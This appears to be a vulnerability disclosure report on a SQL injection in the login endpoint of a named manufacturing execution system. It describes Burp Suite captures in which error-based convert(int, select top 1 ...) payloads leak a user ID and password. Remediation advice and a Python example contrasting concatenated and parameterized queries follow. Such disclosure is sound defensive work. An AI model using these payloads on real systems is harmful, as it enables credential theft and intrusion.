System name: Manufacturing Execution System
System address: URL

Vulnerability details: After data is entered and an injection test is performed, the response returns the error message together with the SQL statement.

[Screenshot: Burp Suite request and response. Request: POST /comresource/rh/Login.ashx HTTP/1.1, Host: hxmis.sgmw.com.cn, Content-Type: application/x-www-form-urlencoded; charset=UTF-8, X-Requested-With: XMLHttpRequest, with funName and params form fields and a JSON data object carrying user_id and userpassword. Response: HTTP/1.1 200 OK, Server: Microsoft-IIS/10.0, X-AspNet-Version: 2.0.50727, X-Powered-By: ASP.NET, Date: Tue, 15 Oct 2024 08:49:57 GMT. The ZMResult message (Type: Error) carries an ODBC Driver 18 for SQL Server syntax error ("附近有语法错误") and the statement that failed to execute, a select * from Pri_Users where user_id=... and userpassword=... query.]

Error-based injection exists:

[Screenshot: Burp Suite request and response for the same endpoint. The user_id field of the request data is admin followed by an "and 1=convert(int, ...)" condition wrapping a select top 1 user_id from Pri_Users query that excludes Zmsupport; the visible userid parameter fragment also references db_name. Response: HTTP/1.1 200 OK, Date: Tue, 15 Oct 2024 08:51:22 GMT. The ZMResult message (Type: Error) reports "在将 varchar 值 yl32 转换成数据类型 int 时失败" and again includes the executed statement.]

[Screenshot: Burp Suite request and response for the same endpoint. The user_id field carries the same convert(int, ...) condition, this time wrapping a select top 1 userpassword from Pri_Users query for user_id yl32. Response: HTTP/1.1 200 OK, Date: Tue, 15 Oct 2024 08:52:31 GMT. The ZMResult message reports a failure converting a varchar value to data type int and includes the executed statement. Label: password.]

This vulnerability leads to disclosure of sensitive database data and may lead to RCE.

Remediation recommendations:

1. Use parameterized queries. Parameterized queries use placeholders in place of the values in the SQL query. When the query executes, the placeholders are filled with the user-supplied parameters, which are handled as data rather than as SQL text.

2. Validate and sanitize input. Validate and sanitize all user input so that the data matches the expected format and type. Regular expressions can be used to check whether a string contains special characters or whether a numeric value is within the valid range. In addition, special characters such as single quotes, double quotes and semicolons should be escaped, and keywords such as select, add and xp_cmdshell should be filtered.

3. Use a Web application firewall (WAF). A WAF analyzes incoming traffic and blocks malicious requests according to a rule set, providing an additional layer of protection for the application.
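The first two remediation items, as an added example that is not code from the original report or from the affected system: a Python version in which `sqlite3` stands in for the SQL Server/ODBC back end, contrasting a concatenated login query that echoes the driver error and statement to the client with a parameterized one that returns a generic message. The table and column names come from the error output in the report; the function names, the `user_id` allow-list pattern and the sample row are constructed assumptions.

```python
import logging
import re
import sqlite3

log = logging.getLogger("login")
USER_ID_RE = re.compile(r"[A-Za-z0-9_]{1,32}")  # assumed allow-list for user_id
GENERIC_FAIL = {"Type": "Fail", "Message": "Invalid user name or password"}

def make_db():
    """Constructed in-memory stand-in for the Pri_Users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Pri_Users (user_id TEXT, userpassword TEXT)")
    db.execute("INSERT INTO Pri_Users VALUES ('demo_user', 'demo_pass')")
    return db

def login_vulnerable(db, user_id, password):
    """Pattern the report describes: concatenation, error text echoed back."""
    sql = ("select * from Pri_Users where user_id='" + user_id +
           "' and userpassword='" + password + "'")
    try:
        found = db.execute(sql).fetchone() is not None
        return {"Type": "OK" if found else "Fail", "Message": ""}
    except sqlite3.Error as exc:
        # Driver error and full statement are returned to the client.
        return {"Type": "Error", "Message": f"{exc}, SQL: {sql}"}

def login_hardened(db, user_id, password):
    """Placeholders bind input as data; errors are logged, never returned."""
    if not USER_ID_RE.fullmatch(user_id):
        return dict(GENERIC_FAIL)
    # Plain comparison mirrors the reported query; password storage is out of scope.
    sql = "select 1 from Pri_Users where user_id=? and userpassword=?"
    try:
        found = db.execute(sql, (user_id, password)).fetchone() is not None
    except sqlite3.Error:
        log.exception("login query failed")  # detail stays server-side
        return {"Type": "Fail", "Message": "Login unavailable"}
    return {"Type": "OK", "Message": ""} if found else dict(GENERIC_FAIL)
```

With an ODBC driver the same `?` placeholder style applies; the response body should never include the statement text or the driver message.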